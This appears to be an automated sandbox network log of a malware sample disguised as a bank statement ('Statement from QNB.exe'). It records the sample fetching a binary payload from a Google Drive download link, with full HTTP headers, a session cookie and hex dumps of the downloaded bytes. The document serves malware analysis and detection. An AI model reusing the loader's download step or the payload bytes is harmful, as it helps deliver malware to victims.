                                                                                                  2021-11-24 13:17:13 UTC364INHTTP/1.1 302 Moved Temporarily
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                  Date: Wed, 24 Nov 2021 13:17:13 GMT
                                                                                                  Location: https://doc-0k-48-docs.googleusercontent.com/docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/06007705055686197661/09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=download
                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                                                                  Content-Security-Policy: script-src 'nonce-Y3XJzajClOGuc/3a9/NA0Q' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                                                                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  Server: GSE
                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                  Accept-Ranges: none
                                                                                                  Vary: Accept-Encoding
                                                                                                  Connection: close
                                                                                                  Transfer-Encoding: chunked
                                                                                                  2021-11-24 13:17:13 UTC365INData Raw: 31 39 38 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e
                                                                                                  Data Ascii: 198<HTML><HEAD><TITLE>
                                                                                                  2021-11-24 13:17:13 UTC365INData Raw: 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 6b 2d 34 38 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 33 35 73 75 6d 76 6a 30 76 75 65 32 72 69 32 75 76 32 65 63 61 73 64 64 67 32 38 6d 63 64 6b 6a 2f 61 64 36 67 6c 72 38 6c 30 68 39 39 68 71 70 6e 67 74 66 6e 69 36 61 38 69 32 32 6e 76 36
                                                                                                  Data Ascii: Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0k-48-docs.googleusercontent.com/docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv6
                                                                                                  2021-11-24 13:17:13 UTC365INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  7192.168.11.2049832142.250.186.97443C:\Users\user\Desktop\Statement from QNB.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2021-11-24 13:17:13 UTC365OUTGET /docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/06007705055686197661/09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=download HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                  Cache-Control: no-cache
                                                                                                  Host: doc-0k-48-docs.googleusercontent.com
                                                                                                  Connection: Keep-Alive
                                                                                                  Cookie: AUTH_slujndimmid19jcuof4vvgvj59t5oehn=09438607504833105235Z|1637759775000|us3t0nbh97o1s1g8jtgaiaegnreqqlkj
                                                                                                  2021-11-24 13:17:14 UTC366INHTTP/1.1 200 OK
                                                                                                  X-GUploader-UploadID: ADPycduPm2_c8q_o3mUplgJQgAlRpPJGVDYgfMBldXwqjVP_8Z4bNNKUiU7FiWRi-5m4MmkDLxS5qYHDf8xbEkaOnfU
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                                                                                  Access-Control-Allow-Methods: GET,OPTIONS
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Disposition: attachment;filename="waama_RvvwNtEXp180.bin";filename*=UTF-8''waama_RvvwNtEXp180.bin
                                                                                                  Content-Length: 176192
                                                                                                  Date: Wed, 24 Nov 2021 13:17:14 GMT
                                                                                                  Expires: Wed, 24 Nov 2021 13:17:14 GMT
                                                                                                  Cache-Control: private, max-age=0
                                                                                                  X-Goog-Hash: crc32c=cdecFw==
                                                                                                  Server: UploadServer
                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                  Connection: close
                                                                                                  2021-11-24 13:17:14 UTC370INData Raw: a0 cc d0 7b 2b ed 91 27 f3 6f 12 07 92 55 fe 80 c5 3f ba ab f1 5c 08 6a c5 53 dc 6f 75 a4 65 c5 53 55 57 a8 71 5e 6e 61 48 5b 13 8e 8a 61 5e 2a 63 12 4b b4 2c 5c bf 34 c6 3d c9 3f 85 06 50 8d 22 80 28 44 46 d7 e3 dc 4a 98 5e 66 97 08 97 62 b4 61 19 3a 73 07 0a ba 1d 3b 41 79 77 50 f2 fb c1 ef cb 99 73 83 0a 59 d5 93 7c 91 69 4c 46 07 32 0c e1 fe 90 4e 4f 63 e6 1c e1 aa e6 a6 20 f3 7e b5 2d 27 70 3f 3c d1 be ed ee f0 89 37 3a 82 60 bd 2b 70 08 b1 52 c2 5d 2b 9e 12 86 bb 7e f8 6a 87 40 4c 12 d6 85 a9 17 32 5e c6 95 3d 2b d2 5b b8 55 cf e7 5a ab c2 9c 0e 84 1c f2 74 17 1c af b2 a0 0c e1 5f 8a c5 d5 d1 f3 fc e5 3c 29 28 6f 56 f3 a1 aa d3 ce 1d 35 e4 6d 5f ab 63 09 82 70 ba 85 fa 52 06 0a c9 e8 f3 07 fa 02 54 3e 86 33 4a 03 5d 94 85 83 7d b1 68 c4 40 be 73 83
                                                                                                  Data Ascii: {+'oU?\jSoueSUWq^naH[a^*cK,\4=?P"(DFJ^fba:s;AywPsY|iLF2NOc ~-'p?<7:`+pR]+~j@L2^=+[UZt_<)(oV5m_cpRT>3J]}h@s
                                                                                                  2021-11-24 13:17:14 UTC373INData Raw: 7f 19 ea 5b 9e 2d 91 54 bb 2b 6c 2e 75 21 3d d8 a5 20 d2 0e 69 11 c8 d2 e7 0e 6f 59 87 60 a2 a9 a6 a6 1e 7e 1d 8b b1 f3 83 0d 51 c5 da 55 94 f2 c0 aa 95 b6 22 85 b9 00 ac fe 36 72 f4 94 6a 14 fb 83 0c 65 6a 49 dc f1 e1 1e d8 ec ec 70 ab 88 89 23 e3 81 6a c6 83 a6 25 42 f3 64 5d 22 b3 08 0b 7b 78 26 6d 5f bb 47 65 1a 4d d4 36 f0 fa f4 51 95 c1 52 eb a9 5c 1a a3 fa 10 e2 10 81 6a ae db b9 c9 d7 88 e4 eb 7f f2 40 fc 65 0c 55 eb 27 0d ea df c6 ec ee a5 ee d4 9d c0 d7 43 f9 21 42 8c f6 6c df 92 6f 0a 8c d3 89 db ad 07 f4 2a 43 6a c1 28 f5 b1 7e a7 7d 75 e8 ec 5e 50 61 74 b3 71 77 86 7b 4c 04 ae da 4d 39 95 14 6c 0e 88 6e b5 57 d7 34 7f 59 8a 99 2b 2e b0 68 f6 ea 06 a2 01 85 ef 4a 07 f0 24 c5 59 f4 e1 49 c9 11 dd 05 9f 1c 07 be 9d ab 68 46 0e 4a c0 4d 32 7c 78
                                                                                                  Data Ascii: [-T+l.u!= ioY`~QU"6rjejIp#j%Bd]"{x&m_GeM6QR\j@eU'C!Blo*Cj(~}u^Patqw{LM9lnW4Y+.hJ$YIhFJM2|x
                                                                                                  2021-11-24 13:17:14 UTC377INData Raw: 65 67 47 4b fd 04 1c 84 19 93 5b ae ea ee 78 d2 9e b8 1b 9b e3 02 15 91 f1 67 0f e0 5b e5 69 7c 0c 89 29 b7 51 54 8e 9d 06 1e 02 b3 1b 29 68 d9 cc 28 fb 23 00 c5 33 f9 15 b7 6a 17 cd 28 6c b2 27 8c 31 0e b9 26 f6 8b 79 4a d5 0b c6 da 0a 66 5d 9b f1 f7 54 02 34 62 55 22 7c 7f f3 4a d8 5b e9 4a da b8 ba 45 d7 e3 00 4e 98 5e df 68 f7 97 f4 0c 61 19 49 73 07 0a ea 5d 3b 95 86 94 50 43 04 06 ef 45 66 d8 83 61 a6 5a 93 34 6e 1a 4c 63 f8 65 0c e1 01 c5 4e 4f bf af 1c e1 13 6b a6 20 65 41 aa 97 5a 55 8b 35 4c 86 55 3b 43 b4 16 df 15 eb ce 85 ff ae de 5e 4f fa 46 f6 8e 5f d5 35 68 b4 a7 22 d6 98 a4 f0 1b a5 5b 30 5f ab 72 78 64 54 d7 31 d9 83 57 a6 98 8a 0e 50 e3 0d 74 a6 e3 99 53 29 28 93 df 88 b2 a7 51 d2 8b 97 bc 65 5f 2b f0 97 d7 d8 53 a7 49 bb 8d 0e 8e 9f e3
                                                                                                  Data Ascii: egGK[xg[i|)QT)h(#3j(l'1&yJf]T4bU"|J[JEN^haIs];PCEfaZ4nLceNOk eAZU5LU;C^OF_5h"[0_rxdT1WPtS)(Qe_+SI
                                                                                                  2021-11-24 13:17:14 UTC381INData Raw: 45 19 d7 80 26 d0 e8 77 92 18 5d 08 7d 97 82 0e 16 43 64 8c 52 19 d8 2c f5 5a c6 f7 9f 8d b6 7a f2 7f 19 ea 5b 9e 2d 91 54 bb 2b 6c 2e 75 21 3d d8 a5 20 d2 0e 69 71 e2 92 e7 e2 47 19 87 f2 b2 e9 a6 3e 0e 3e 1d 15 a1 b3 83 0d 51 c5 da 55 94 f2 c0 aa 95 b6 22 85 b9 00 ac fe 36 72 f4 94 6a 14 fb 83 0c 65 6a 49 dc f1 e1 1e d8 ec ec 70 ab 88 89 23 e3 81 6a c6 83 a6 25 42 f3 64 5d 22 b3 08 0b 7b 78 26 6d 5f bb 47 65 1a 4d d4 36 f0 fa f4 51 1d eb 12 eb 45 74 5a a3 68 00 a2 10 19 7a ee db 27 d9 97 88 e4 eb 7f f2 40 fc 65 0c 55 eb 27 0d ea df c6 ec ee a5 ee d4 9d c0 d7 43 f9 21 42 8c f6 6c df 92 6f 0a 8c d3 89 db ad 07 f4 2a 43 6a c1 28 f5 b1 7e a7 7d 75 e8 ec 5e 50 61 74 b3 71 77 86 7b 4c 04 ae da 4d 39 95 14 6c 0e 88 6e b5 57 d7 34 7f 59 8a 99 2b 2e b0 68 f6 5a
                                                                                                  Data Ascii: E&w]}CdR,Zz[-T+l.u!= iqG>>QU"6rjejIp#j%Bd]"{x&m_GeM6QEtZhz'@eU'C!Blo*Cj(~}u^Patqw{LM9lnW4Y+.hZ
                                                                                                  2021-11-24 13:17:14 UTC382INData Raw: 06 1c fc da b5 12 a5 75 26 c0 b0 61 08 8e 37 0d aa 76 d3 c5 74 b0 f4 b7 37 2a 35 28 5a 83 e1 8c 1b 2b 84 26 ba 92 16 4a 84 df 32 0e 0f d7 f3 2a 92 79 fe 8c 05 09 fe 49 43 37 51 02 f2 7e 58 6f fc b8 18 45 fc e3 9a 4e b9 5e 2d 68 ee 97 02 0c 6f 19 45 73 06 0a cd 5d 5b 41 7d 77 2a f2 ee c1 9b cb e7 73 b5 0a 34 d5 94 7c c7 69 15 46 2d 32 46 e1 a8 90 1c 4f 3a e6 71 e1 df 56 97 20 b2 70 85 97 72 70 b6 35 4f 9f 71 ef d0 44 2e 6e 8d 09 c2 0b 72 7a db 35 ce 3c 34 be 7b e7 fa 10 91 1e f6 22 5b 32 eb f0 cd 37 25 30 8d d1 6c 78 94 36 d8 31 c0 c9 3f a6 db b8 7b 84 4d f2 20 17 43 66 71 a7 94 6c f9 e3 1a 58 66 9a 1c 68 8f 40 c5 d4 c3 97 7a 26 62 a7 d3 67 a0 0e 74 26 d3 60 18 70 b8 85 a7 52 3b 0a 8b e8 bb 07 ca 02 1b 3e 8a 63 7f 03 33 d8 8a 80 25 4a 93 e8 4f be 3c 83 d0
                                                                                                  Data Ascii: u&a7vt7*5(Z+&J2*yIC7Q~XoEN^-hoEs][A}w*s4|iF-2FO:qV prp5OqD.nrz5<4{"[27%0lx61?{M CfqlXfh@z&bgt&`pR;>c3%JO<
                                                                                                  2021-11-24 13:17:14 UTC383INData Raw: 39 65 28 49 e9 f1 d8 1e ed ec ad 70 9e 88 cd 23 a0 81 59 c6 83 a6 25 42 d8 59 a6 de 49 a8 63 6b df 1e 65 5f 90 74 14 af 9e d4 ac 0d 22 05 95 dd 56 cc b5 87 07 5c b7 78 3a df eb 7d 90 0e b3 a9 6e ef 80 e4 c0 4c 83 f5 d7 73 d0 90 d4 af 3a a7 6a 93 01 ac 9e eb a3 46 e1 ea b8 05 db e2 e4 e6 cb e7 9a 6f 21 bf a2 3c 98 c1 66 87 59 43 6a c1 84 c5 f1 7e 3f 4f 35 e8 ec 5e 54 61 e8 c5 31 77 86 7b 4c 04 ae da 4d 39 34 b0 1a 4e 88 65 75 23 d5 cb 9f 31 de af 6b 2e 08 38 e6 aa 06 5d d1 7a 0f 4a 07 f0 2e c5 59 f4 b1 1a 88 41 94 2b db 50 4b be 9d ab 66 46 0e 4a 85 23 47 11 28 b2 0b 97 ef 5d 4a fd 55 0d e7 d4 92 2e 12 d1 6e e2 5d bc a9 d7 3d 79 34 c1 cf 40 da 0d 16 d1 3f 81 5f cd ec a3 2f 83 f3 88 b2 84 c4 15 dd 39 71 59 53 c2 4a 71 3f 07 ca 17 f7 1b 6d c0 a8 bb 24 2f b6
                                                                                                  Data Ascii: 9e(Ip#Y%BYIcke_t"V\x:}nLs:jFo!<fYCj~?O5^Ta1w{LM94Neu#1k.8]zJ.YA+PKfFJ#G(]JU.n]=y4@?_/9qYSJq?m$/
                                                                                                  2021-11-24 13:17:14 UTC384INData Raw: cb 99 73 83 0a 59 d5 93 6c 37 81 4a ac 49 9f 3f 78 98 5f 5f f8 6f e6 b6 e1 ca 85 35 46 81 11 9b 97 29 70 8b c7 52 32 66 76 da 8b 07 d9 e6 09 64 0b 60 a9 4d 56 dd 58 14 cb 1f e7 d5 02 d8 b3 94 bb 4f fd b5 47 cb 37 f1 30 86 02 e1 14 81 42 e6 31 aa c9 57 c5 a5 dc 3c 84 1c f2 74 74 71 02 62 a7 d7 6c df f2 4d 58 51 dd 11 1c f1 2f c4 a1 9c f2 61 47 3d c3 f9 02 cc 0e 37 26 e3 cc 3a 30 ba e1 c1 12 06 0a c9 ec f3 d7 8c 42 54 3e 86 63 0f 03 5d d8 84 21 a5 3c ee e8 1d 7e 07 81 0c d5 51 11 4b 5c 0b 02 38 94 ef b7 6f 79 be 7f e1 ec 80 a4 9d a3 d6 9c 1c 93 4c 66 ef 79 cc 57 0c eb 27 ac c4 72 f1 73 1d f3 34 39 5a f3 ce 88 69 5c e3 57 a7 ca 19 a2 63 34 8e b2 cd 10 5f 5f 37 5f 31 db 17 55 ae ab 55 39 53 e4 a7 ab 7d 1d ea 25 8a 2b 69 b4 03 bf de 5e 46 11 62 ab 57 89 c5 2b
                                                                                                  Data Ascii: sYl7JI?x__o5F)pR2fvd`MVXOG70B1W<ttqblMXQ/aG=7&:0BT>c]!<~QK\8oyLfyW'rs49Zi\Wc4__7_1UU9S}%+i^FbW+
                                                                                                  2021-11-24 13:17:14 UTC386INData Raw: df fe 63 0a 79 d1 89 db ad b5 01 2b 43 6a c1 86 f1 c5 81 59 f3 74 e8 fd 5e 51 61 f4 b3 1d 03 79 36 28 fb bf fa b1 3b a4 6c 93 1a 88 16 90 17 d7 3c 7f 41 8a a9 2b 1a b0 68 f6 ea 06 a2 01 9d ef 4a 07 f0 24 df 59 f4 e1 49 c9 13 dd 05 9f 1c 06 c6 62 aa 68 32 f1 4f c1 4d 32 7c 78 c0 64 f4 8a 22 39 98 26 0d e7 d4 1e 18 52 d1 f2 d0 65 43 a3 d5 39 7d 9c 4a 7b 43 da f0 f9 d9 3f bd 5f 39 b2 38 2b 3c f7 fb 8d f7 ce ea 35 51 84 1b ec 9d fa 21 13 47 c7 f4 27 e0 8d 34 57 23 3f 2f b6 44 59 1e 33 30 fa 32 c4 8e 17 a2 6d 0c 17 fb 58 47 7b 8e 23 7f 9a 65 af 77 ea 77 eb 27 dc 05 39 62 56 6c b3 48 84 da ab df 2b 2c 53 7d 07 2f 9b 41 b0 33 b3 6d af de 3f 86 d2 60 18 07 5a 63 53 01 e6 b0 7e 17 e2 e8 01 a2 d2 bf e9 0a 04 bc e3 31 a5 42 2b 99 fd 84 0c 16 39 21 3b 2b af fc f8 bc
                                                                                                  Data Ascii: cy+CjYt^Qay6(;l<A+hJ$YIbh2OM2|xd"9&ReC9}J{C?_98+<5Q!G'4W#?/DY302mXG{#eww'9bVlH+,S}/A3m?`ZcS~1B+9!;+
                                                                                                  2021-11-24 13:17:14 UTC387INData Raw: bb 1c 20 16 4d 58 51 9a b3 18 c6 bf b5 d4 f0 97 51 03 13 a7 9d 67 c9 0e b7 26 cb 60 0a 70 ba 85 fa 52 1e 0a c9 e8 f3 07 ea 02 54 3e 86 63 0e 03 5d d8 84 80 09 b5 af e8 00 be 73 83 f3 35 38 69 70 1c 0b ba 04 7b aa b6 90 a9 41 9f e3 ec 80 ab 0e ab d6 db 79 24 00 1a 80 10 89 33 68 99 b7 df b7 72 f1 d8 25 b3 3c 89 21 ed cb 88 6d 58 92 c7 2e 7f 19 a2 63 34 0e be cd 3e 27 01 93 77 74 db 18 95 ab dd 55 f4 43 db 69 eb 7d a5 ba c0 4a 2b 96 64 90 4f de 13 22 e3 6a eb 53 96 5f 53 51 04 62 32 13 ae f5 0c 28 01 50 a8 06 14 8e b5 34 51 28 00 36 d0 a2 1b da e7 dd 04 7d 63 83 f2 dd b6 65 8c 52 19 72 40 81 a5 aa bb 60 87 b1 7a e6 7f 25 c5 0b 61 18 c5 ab af cb 4d 6e 75 2d 3d ec a5 a8 d2 2a 69 11 c8 d2 e7 0e 6f 41 87 60 a2 a9 a6 aa 1e 7e 1d 8b b1 f3 83 0d 51 c5 da 4d 94 f2
                                                                                                  Data Ascii: MXQQg&`pRT>c]s58ip{Ay$3hr%<!mX.c4>'wtUCi}J+dO"jS_SQb2(P4Q(6}ceRr@`z%aMnu-=*ioA`~QM
                                                                                                  2021-11-24 13:17:14 UTC388INData Raw: 1d 67 3d 09 e7 21 1e 18 52 d1 0c 29 e8 bd a9 d7 39 d7 98 d7 70 0d e2 f2 07 f1 c3 83 7c ed b2 18 5e c3 fb 83 43 88 39 d8 39 51 f9 90 33 3d e6 21 57 62 8a e8 23 e4 d1 c0 0c bb 63 2f b6 44 4d be 10 70 e2 36 c4 82 17 96 51 3c 17 fb 59 47 79 8e 23 67 9a 64 d7 88 eb 61 8b d8 d9 05 39 63 56 6c b3 48 84 a2 54 da 2a 2c 52 7d 95 2e 9a 41 b0 3f b3 6d af de 3f 86 d2 60 19 05 5a 96 53 01 e6 b0 6b 6f 1d 68 0f a2 26 be 15 c1 f9 d8 93 ce 9a 42 63 1e 03 04 3c e9 c4 93 03 2b 56 ef 78 b0 08 b8 19 d1 90 02 81 ab a1 47 0f f6 a0 31 69 bb f4 30 29 0c ae f2 e6 ed d1 75 f9 54 bc 9e 94 ac 6d 0c fb 7e ff 6f c6 9c c9 b7 6a 2d 7c 28 0c 83 12 b9 69 d4 3f 26 f6 92 29 bf d4 df 39 0e 0e 83 5d d4 7f 78 ab 8c 34 19 aa c9 74 c2 0d 02 d8 7e 11 67 da fc 44 05 9a 8b 23 4d d8 a2 e9 3c 08 97 62
                                                                                                  Data Ascii: g=!R)9p|^C99Q3=!Wb#c/DMp6Q<YGy#gda9cVlHT*,R}.A?m?`ZSkoh&Bc<+VxG1i0)uTm~oj-|(i?&)9]x4t~gD#M<b
                                                                                                  2021-11-24 13:17:14 UTC389INData Raw: 7e f1 ae 7d 4c 08 a4 35 4c a2 d8 96 a4 b1 97 53 8b ec a2 63 34 8e b6 a5 ef 33 9a 2c dc 75 db 1c 95 1a 5c ab d9 3b 24 32 15 19 ed 45 b7 cb 47 fe 9b 90 2f 21 c0 b3 1c 62 ab 57 37 b0 5d 57 04 2c 30 17 f6 0a 80 86 ae 93 9a 53 eb fb d5 ba 75 b7 7f da 82 f4 06 93 ed 5d 08 7d 97 77 f1 15 43 64 88 3e e6 26 a2 f4 5a c5 f7 9b 8d 36 7a f6 1b e6 1f 5b 8e 2d 91 a1 bb 2b 6c 2e 19 4d c2 f6 f1 df 92 62 09 ee 96 d1 e7 1e 6f 28 d7 9f 9e 84 f2 59 72 2e e2 77 e3 ef f2 0c 6b fd 25 51 94 bc e8 55 91 9e dd 70 bd 01 ac fe 3d 77 f4 9c 6a 25 a7 7c 39 4d 95 bc d8 f0 e1 1e b4 b0 13 74 8f 77 bd 4f c7 7e 9f c6 83 a6 25 2e 9f 9b c3 4e d3 f7 01 7d 78 36 6d 63 d7 63 9a 1e 11 2b ca a8 d5 d0 ae 60 c0 52 eb a9 30 46 5c e1 14 e2 e5 81 6a ae db 47 34 22 89 e4 eb 7f 5c 2c a0 9a 07 52 eb 2f 0d
                                                                                                  Data Ascii: ~}L5LSc43,u\;$2EG/!bW7]W,0Su]}wCd>&Z6z[-+l.Mbo(Yr.wk%QUp=wj%|9MtwO~%.N}x6mcc+`R0F\jG4"\,R/
                                                                                                  2021-11-24 13:17:14 UTC391INData Raw: 1a 7a 63 60 25 2a 2c 53 7d f2 2d 9b 41 b0 53 c7 92 fd da 4b 79 27 1b 7d 42 fa 02 5b 01 c6 b0 24 66 1d 64 11 d3 16 41 11 b5 05 82 ff fe 65 b7 47 e1 02 04 db 66 bd 6c 30 ac ac 2d 64 4d 09 4d 1b d1 90 02 e0 a0 a1 67 0f 07 d0 ce 97 35 f2 38 29 1c be da 0e 1a d1 11 fd d4 e4 94 68 8e 33 0d 97 02 00 97 1b e4 36 b6 6a df 75 28 6c 83 dd f8 ce 79 e2 62 09 93 29 bf d7 df 39 0e 66 a3 5d 78 0f b8 9f 73 34 09 aa 49 89 34 0c 02 d8 12 62 90 88 bc 30 ba 22 98 b9 0b 38 ca 6e 68 d7 97 3c 05 61 15 3a 02 37 f5 be 29 c4 1b 15 47 af 07 fb c1 ef cb 5e 03 fb f5 47 a2 91 89 91 69 4c 46 f2 31 0c e1 fe 94 3a b0 9d 68 1d e1 aa 56 b6 20 73 78 c6 9b 29 3d ef ca 1f df a9 60 c8 bb 16 6e c2 5d 31 0a 00 8f df 35 b0 3c 2a ca 8e b5 fd 54 68 1f a7 d7 2b 32 a4 f0 ab 43 a4 62 18 10 46 87 f2 36
                                                                                                  Data Ascii: zc`%*,S}-ASKy'}B[$fdAeGfl0-dMMg58)h36ju(lyb)9f]xs4I4b0"8nh<a:7)G^GiLF1:hV sx)=`n]15<*Th+2CbF6
                                                                                                  2021-11-24 13:17:14 UTC392INData Raw: 56 19 d8 2c ac c6 38 9b 07 73 ef da 0c 8a 30 ea 5b 9e 2a 99 54 db 2b f2 db 7d 21 3d d8 0f 79 ba f1 63 14 c8 de e7 05 68 59 87 60 d2 d3 59 b3 ea 7e 6d f1 4e e6 83 0d 51 31 f8 15 94 e2 c0 4e 95 6a 21 a9 b9 00 ac fe 36 72 f4 94 6a 14 fb 83 0c 71 6a 49 dc f1 e1 1c d8 ec ec 70 ab f8 76 22 e3 f5 95 c7 83 84 25 42 f3 64 5d 26 b3 08 0b 7b 78 4a 92 59 bb 0f 9a 18 4d fc c9 f2 fa d0 ae 90 c0 52 eb a9 5c 18 a3 fa 10 a9 72 85 71 ae db bd bd 28 bc 88 9f 80 ac 41 fc 61 0c 24 9b d8 31 f1 dd c6 e8 82 5a da b8 f1 3f bb 33 06 7f 41 8c fe 6c ae fa 90 36 e0 bb 76 aa d5 f8 c6 2e 43 1e 3e 44 0a dd 06 58 88 75 e8 ec 5e 8b 7d 24 b3 84 77 86 7b 4c 0e aa da 49 39 a9 e0 6c 06 80 6e b8 eb d6 31 7f ad 8a 9d 3b d1 b5 6e f6 ce 01 a2 0c 91 ef 42 07 f8 34 3a 54 88 e1 40 c9 0b cd fa b7 ec
                                                                                                  Data Ascii: V,8s0[*T+}!=ychY`Y~mNQ1Nj!6rjqjIpv"%Bd]&{xJYMR\rq(Aa$1Z?3Al6v.C>DXu^}$w{LI9ln1;nB4:T@
